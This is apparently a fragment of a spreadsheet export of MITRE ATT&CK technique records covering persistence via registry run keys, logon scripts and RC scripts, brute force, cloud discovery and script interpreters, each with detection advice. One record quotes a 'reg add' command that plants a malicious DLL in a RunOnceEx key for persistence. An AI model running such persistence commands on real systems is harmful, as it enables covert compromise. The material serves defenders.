    <s v="Windows"/>
    <s v="Driver: Driver Load, File: File Creation, Module: Module Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1547"/>
    <s v="Mathieu Tartare, ESET"/>
    <s v="Administrator, SYSTEM"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1547.007"/>
    <x v="55"/>
    <s v="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_x000a__x000a_An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence)."/>
    <s v="https://attack.mitre.org/techniques/T1547/007"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2020-01-24T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened."/>
    <s v="macOS"/>
    <s v="Command: Command Execution, File: File Modification"/>
    <b v="1"/>
    <s v="T1547"/>
    <m/>
    <s v="User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1547.001"/>
    <x v="56"/>
    <s v="Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the &quot;run keys&quot; in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level._x000a__x000a_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_x000a__x000a_The following run keys are created by default on Windows systems:_x000a__x000a_* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;_x000a__x000a_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quot;Depend&quot; key with RunOnceEx: &lt;code&gt;reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d &quot;C:\temp\evil[.]dll&quot;&lt;/code&gt; (Citation: Oddvar Moe RunOnceEx Mar 2018)_x000a__x000a_The following Registry keys can be used to set startup folder items for persistence:_x000a__x000a_* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;/code&gt;_x000a__x000a_The following Registry keys can control automatic startup of services during boot:_x000a__x000a_* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices&lt;/code&gt;_x000a__x000a_Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:_x000a__x000a_* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;_x000a__x000a_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_x000a__x000a_Programs listed in the load value of the registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; run when any user logs on._x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1547/001"/>
    <d v="2020-01-23T00:00:00"/>
    <d v="2021-01-06T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="10"/>
    <s v="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_x000a__x000a_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s v="Windows"/>
    <s v="Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1547"/>
    <s v="Oddvar Moe, @oddvarmoe"/>
    <s v="Administrator, User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1547.005"/>
    <x v="57"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1547/005"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2020-03-25T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="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
    <s v="Windows"/>
    <s v="Command: Command Execution, Module: Module Load, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1547"/>
    <m/>
    <s v="Administrator"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1547.009"/>
    <x v="58"/>
    <s v="Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1547/009"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="10"/>
    <s v="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_x000a__x000a_Monitor for LNK files created with a Zone Identifier value greater than 1, which may indicate that the LNK file originated from outside of the network.(Citation: BSidesSLC 2020 - LNK Elastic)"/>
    <s v="Windows"/>
    <s v="File: File Creation, File: File Modification, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1547"/>
    <s v="Bobby, Filar, Elastic; David French, Elastic; Travis Smith, Tripwire"/>
    <s v="Administrator, User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1547.003"/>
    <x v="59"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1547/003"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2020-03-25T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="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_x000a__x000a_The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)"/>
    <s v="Windows"/>
    <s v="Command: Command Execution, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1547"/>
    <s v="Scott Lundgren, @5twenty9, Carbon Black"/>
    <s v="Administrator, SYSTEM"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1547.004"/>
    <x v="60"/>
    <s v="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_x000a__x000a_Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)_x000a__x000a_* Winlogon\Notify - points to notification package DLLs that handle Winlogon events_x000a_* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on_x000a_* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on_x000a__x000a_Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence."/>
    <s v="https://attack.mitre.org/techniques/T1547/004"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="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_x000a__x000a_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
    <s v="Windows"/>
    <s v="Command: Command Execution, Module: Module Load, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1547"/>
    <s v="Praetorian"/>
    <s v="Administrator, SYSTEM"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1547.013"/>
    <x v="61"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1547/013"/>
    <d v="2019-09-10T00:00:00"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="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_x000a_ _x000a_Suspicious processes or scripts spawned in this manner will have a parent process of the desktop component implementing the XDG specification and will execute as the logged on user."/>
    <s v="Linux"/>
    <s v="Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1547"/>
    <s v="Tony Lambert, Red Canary"/>
    <s v="User, root"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1037"/>
    <x v="62"/>
    <s v="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_x000a__x000a_Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. _x000a__x000a_An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges."/>
    <s v="https://attack.mitre.org/techniques/T1037"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="2.1"/>
    <x v="10"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1037.002"/>
    <x v="63"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1037/002"/>
    <d v="2020-01-10T00:00:00"/>
    <d v="2020-03-27T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="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
    <s v="macOS"/>
    <s v="Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1037"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1037.001"/>
    <x v="64"/>
    <s v="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_x000a__x000a_Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. "/>
    <s v="https://attack.mitre.org/techniques/T1037/001"/>
    <d v="2020-01-10T00:00:00"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="Monitor for changes to Registry values associated with Windows logon scrips, nameley &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;._x000a__x000a_Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon."/>
    <s v="Windows"/>
    <s v="Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation"/>
    <b v="1"/>
    <s v="T1037"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1037.003"/>
    <x v="65"/>
    <s v="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_x000a_ _x000a_Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary."/>
    <s v="https://attack.mitre.org/techniques/T1037/003"/>
    <d v="2020-01-10T00:00:00"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="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
    <s v="Windows"/>
    <s v="Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1037"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1037.004"/>
    <x v="66"/>
    <s v="Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify._x000a__x000a_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_x000a__x000a_Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1037/004"/>
    <d v="2020-01-15T00:00:00"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="2"/>
    <x v="10"/>
    <s v="Monitor for unexpected changes to RC scripts in the &lt;code&gt;/etc/&lt;/code&gt; directory. Monitor process execution resulting from RC scripts for unusual or unknown applications or behavior._x000a__x000a_Monitor for &lt;code&gt;/etc/rc.local&lt;/code&gt; file creation. Although types of RC scripts vary for each Unix-like distribution, several execute &lt;code&gt;/etc/rc.local&lt;/code&gt; if present. "/>
    <s v="Linux, macOS"/>
    <s v="Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1037"/>
    <m/>
    <s v="root"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1037.005"/>
    <x v="67"/>
    <s v="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_x000a__x000a_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_x000a__x000a_An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user."/>
    <s v="https://attack.mitre.org/techniques/T1037/005"/>
    <d v="2020-01-15T00:00:00"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="The &lt;code&gt;/Library/StartupItems&lt;/code&gt; folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist._x000a__x000a_Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior."/>
    <s v="macOS"/>
    <s v="Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1037"/>
    <m/>
    <s v="Administrator"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1217"/>
    <x v="68"/>
    <s v="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_x000a__x000a_Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser._x000a__x000a_Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases."/>
    <s v="https://attack.mitre.org/techniques/T1217"/>
    <d v="2018-04-18T00:00:00"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="1"/>
    <x v="2"/>
    <s v="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_x000a__x000a_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s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="Mike Kemmerer"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1176"/>
    <x v="69"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command &amp; control.(Citation: Chrome Extension C2 Malware)"/>
    <s v="https://attack.mitre.org/techniques/T1176"/>
    <d v="2018-01-16T00:00:00"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="1.2"/>
    <x v="3"/>
    <s v="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_x000a__x000a_Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation._x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation"/>
    <b v="0"/>
    <m/>
    <s v="Chris Ross @xorrior; Justin Warner, ICEBRG"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1110"/>
    <x v="70"/>
    <s v="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s v="https://attack.mitre.org/techniques/T1110"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="2.2000000000000002"/>
    <x v="11"/>
    <s v="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
    <s v="Azure AD, Containers, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Application Log: Application Log Content, User Account: User Account Authentication"/>
    <b v="0"/>
    <m/>
    <s v="Alfredo Oliveira, Trend Micro; David Fiser, @anu4is, Trend Micro; Ed Williams, Trustwave, SpiderLabs; Magno Logan, @magnologan, Trend Micro; Yossi Weizman, Azure Defender Research Team"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1110.004"/>
    <x v="71"/>
    <s v="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_x000a__x000a_Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies._x000a__x000a_Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:_x000a__x000a_* SSH (22/TCP)_x000a_* Telnet (23/TCP)_x000a_* FTP (21/TCP)_x000a_* NetBIOS / SMB / Samba (139/TCP &amp; 445/TCP)_x000a_* LDAP (389/TCP)_x000a_* Kerberos (88/TCP)_x000a_* RDP / Terminal Services (3389/TCP)_x000a_* HTTP/HTTP Management Services (80/TCP &amp; 443/TCP)_x000a_* MSSQL (1433/TCP)_x000a_* Oracle (1521/TCP)_x000a_* MySQL (3306/TCP)_x000a_* VNC (5900/TCP)_x000a__x000a_In addition to management services, adversaries may &quot;target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,&quot; as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)"/>
    <s v="https://attack.mitre.org/techniques/T1110/004"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="1.2"/>
    <x v="11"/>
    <s v="Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials."/>
    <s v="Azure AD, Containers, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Application Log: Application Log Content, User Account: User Account Authentication"/>
    <b v="1"/>
    <s v="T1110"/>
    <s v="Anastasios Pingios; Diogo Fernandes"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1110.002"/>
    <x v="72"/>
    <s v="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s v="https://attack.mitre.org/techniques/T1110/002"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="11"/>
    <s v="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
    <s v="Azure AD, Linux, Office 365, Windows, macOS"/>
    <s v="Application Log: Application Log Content, User Account: User Account Authentication"/>
    <b v="1"/>
    <s v="T1110"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1110.001"/>
    <x v="73"/>
    <s v="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_x000a__x000a_Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)_x000a__x000a_Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:_x000a__x000a_* SSH (22/TCP)_x000a_* Telnet (23/TCP)_x000a_* FTP (21/TCP)_x000a_* NetBIOS / SMB / Samba (139/TCP &amp; 445/TCP)_x000a_* LDAP (389/TCP)_x000a_* Kerberos (88/TCP)_x000a_* RDP / Terminal Services (3389/TCP)_x000a_* HTTP/HTTP Management Services (80/TCP &amp; 443/TCP)_x000a_* MSSQL (1433/TCP)_x000a_* Oracle (1521/TCP)_x000a_* MySQL (3306/TCP)_x000a_* VNC (5900/TCP)_x000a__x000a_In addition to management services, adversaries may &quot;target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,&quot; as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)_x000a__x000a_In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows &quot;logon failure&quot; event ID 4625."/>
    <s v="https://attack.mitre.org/techniques/T1110/001"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="1.2"/>
    <x v="11"/>
    <s v="Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials."/>
    <s v="Azure AD, Containers, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Application Log: Application Log Content, User Account: User Account Authentication"/>
    <b v="1"/>
    <s v="T1110"/>
    <s v="Microsoft Threat Intelligence Center (MSTIC)"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1110.003"/>
    <x v="74"/>
    <s v="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_x000a__x000a_Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:_x000a__x000a_* SSH (22/TCP)_x000a_* Telnet (23/TCP)_x000a_* FTP (21/TCP)_x000a_* NetBIOS / SMB / Samba (139/TCP &amp; 445/TCP)_x000a_* LDAP (389/TCP)_x000a_* Kerberos (88/TCP)_x000a_* RDP / Terminal Services (3389/TCP)_x000a_* HTTP/HTTP Management Services (80/TCP &amp; 443/TCP)_x000a_* MSSQL (1433/TCP)_x000a_* Oracle (1521/TCP)_x000a_* MySQL (3306/TCP)_x000a_* VNC (5900/TCP)_x000a__x000a_In addition to management services, adversaries may &quot;target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,&quot; as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)_x000a__x000a_In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows &quot;logon failure&quot; event ID 4625."/>
    <s v="https://attack.mitre.org/techniques/T1110/003"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="1.2"/>
    <x v="11"/>
    <s v="Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts._x000a__x000a_Consider the following event IDs:(Citation: Trimarc Detecting Password Spraying)_x000a__x000a_* Domain Controllers: &quot;Audit Logon&quot; (Success &amp; Failure) for event ID 4625._x000a_* Domain Controllers: &quot;Audit Kerberos Authentication Service&quot; (Success &amp; Failure) for event ID 4771._x000a_* All systems: &quot;Audit Logon&quot; (Success &amp; Failure) for event ID 4648."/>
    <s v="Azure AD, Containers, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Application Log: Application Log Content, User Account: User Account Authentication"/>
    <b v="1"/>
    <s v="T1110"/>
    <s v="John Strand; Microsoft Threat Intelligence Center (MSTIC)"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1612"/>
    <x v="75"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1612"/>
    <d v="2021-03-30T00:00:00"/>
    <d v="2021-04-19T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="Monitor for unexpected Docker image build requests to the Docker daemon on hosts in the environment. Additionally monitor for subsequent network communication with anomalous IPs that have never been seen before in the environment that indicate the download of malicious code."/>
    <s v="Containers"/>
    <s v="Image: Image Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <s v="Assaf Morag, @MoragAssaf, Team Nautilus Aqua Security; Michael Katchinskiy, @michael64194968, Team Nautilus Aqua Security; Roi Kol, @roykol1, Team Nautilus Aqua Security; Vishwas Manral, McAfee"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1115"/>
    <x v="76"/>
    <s v="Adversaries may collect data stored in the clipboard from users copying information within or between applications. _x000a__x000a_In Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, &lt;code&gt;pbpaste&lt;/code&gt;, to grab clipboard contents.(Citation: Operating with EmPyre)"/>
    <s v="https://attack.mitre.org/techniques/T1115"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-04-23T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="7"/>
    <s v="Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Process: OS API Execution"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1580"/>
    <x v="77"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1580"/>
    <d v="2020-08-20T00:00:00"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="2"/>
    <s v="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
    <s v="IaaS"/>
    <s v="Cloud Storage: Cloud Storage Enumeration, Cloud Storage: Cloud Storage Metadata, Instance: Instance Enumeration, Instance: Instance Metadata, Snapshot: Snapshot Enumeration, Snapshot: Snapshot Metadata, Volume: Volume Enumeration, Volume: Volume Metadata"/>
    <b v="0"/>
    <m/>
    <s v="Praetorian"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1538"/>
    <x v="78"/>
    <s v="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_x000a__x000a_Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests."/>
    <s v="https://attack.mitre.org/techniques/T1538"/>
    <d v="2019-08-30T00:00:00"/>
    <d v="2021-03-16T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="2"/>
    <s v="Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)"/>
    <s v="Azure AD, Google Workspace, IaaS, Office 365"/>
    <s v="Logon Session: Logon Session Creation, User Account: User Account Authentication"/>
    <b v="0"/>
    <m/>
    <s v="Praetorian"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1526"/>
    <x v="79"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)"/>
    <s v="https://attack.mitre.org/techniques/T1526"/>
    <d v="2019-08-30T00:00:00"/>
    <d v="2021-03-16T00:00:00"/>
    <n v="1.2"/>
    <x v="2"/>
    <s v="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_x000a__x000a_Normal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment."/>
    <s v="Azure AD, Google Workspace, IaaS, Office 365, SaaS"/>
    <s v="Cloud Service: Cloud Service Enumeration, Cloud Service: Cloud Service Metadata"/>
    <b v="0"/>
    <m/>
    <s v="Praetorian; Suzy Schapperle - Microsoft Azure Red Team"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1059"/>
    <x v="80"/>
    <s v="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_x000a__x000a_There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005)._x000a__x000a_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s v="https://attack.mitre.org/techniques/T1059"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="2.1"/>
    <x v="13"/>
    <s v="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_x000a__x000a_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s v="Linux, Network, Windows, macOS"/>
    <s v="Command: Command Execution, Module: Module Load, Process: Process Creation, Script: Script Execution"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <b v="0"/>
  </r>
  <r>
    <s v="T1059.002"/>
    <x v="81"/>
    <s v="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_x000a__x000a_Scripts can be run from the command-line via &lt;code&gt;osascript /path/to/script&lt;/code&gt; or &lt;code&gt;osascript -e &quot;script here&quot;&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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1059/002"/>
    <d v="2020-03-09T00:00:00"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="13"/>
    <s v="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_x000a__x000a_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 v="macOS"/>
    <s v="Command: Command Execution, Process: OS API Execution, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1059"/>
    <s v="Phil Stokes, SentinelOne"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1059.007"/>
    <x v="82"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1059/007"/>
    <d v="2020-06-23T00:00:00"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="2"/>
    <x v="13"/>
    <s v="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_x000a__x000a_Monitor for execution of JXA through &lt;code&gt;osascript&lt;/code&gt; and usage of &lt;code&gt;OSAScript&lt;/code&gt; API that may be related to other suspicious behavior occurring on the system._x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Module: Module Load, Process: Process Creation, Script: Script Execution"/>
    <b v="1"/>
    <s v="T1059"/>
    <s v="Cody Thomas, SpecterOps"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1059.008"/>
    <x v="83"/>
    <s v="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_x000a__x000a_Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or secure shell (SSH)._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1059/008"/>
    <d v="2020-10-20T00:00:00"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="1"/>
    <x v="13"/>
    <s v="Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.(Citation: Cisco IOS Software Integrity Assurance - Command History)_x000a__x000a_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
    <s v="Network"/>
    <s v="Command: Command Execution"/>
    <b v="1"/>
    <s v="T1059"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1059.001"/>
    <x v="84"/>
    <s v="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_x000a__x000a_PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk._x000a__x000a_A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1059/001"/>
    <d v="2020-03-09T00:00:00"/>
    <d v="2020-06-24T00:00:00"/>
    <n v="1"/>
    <x v="13"/>
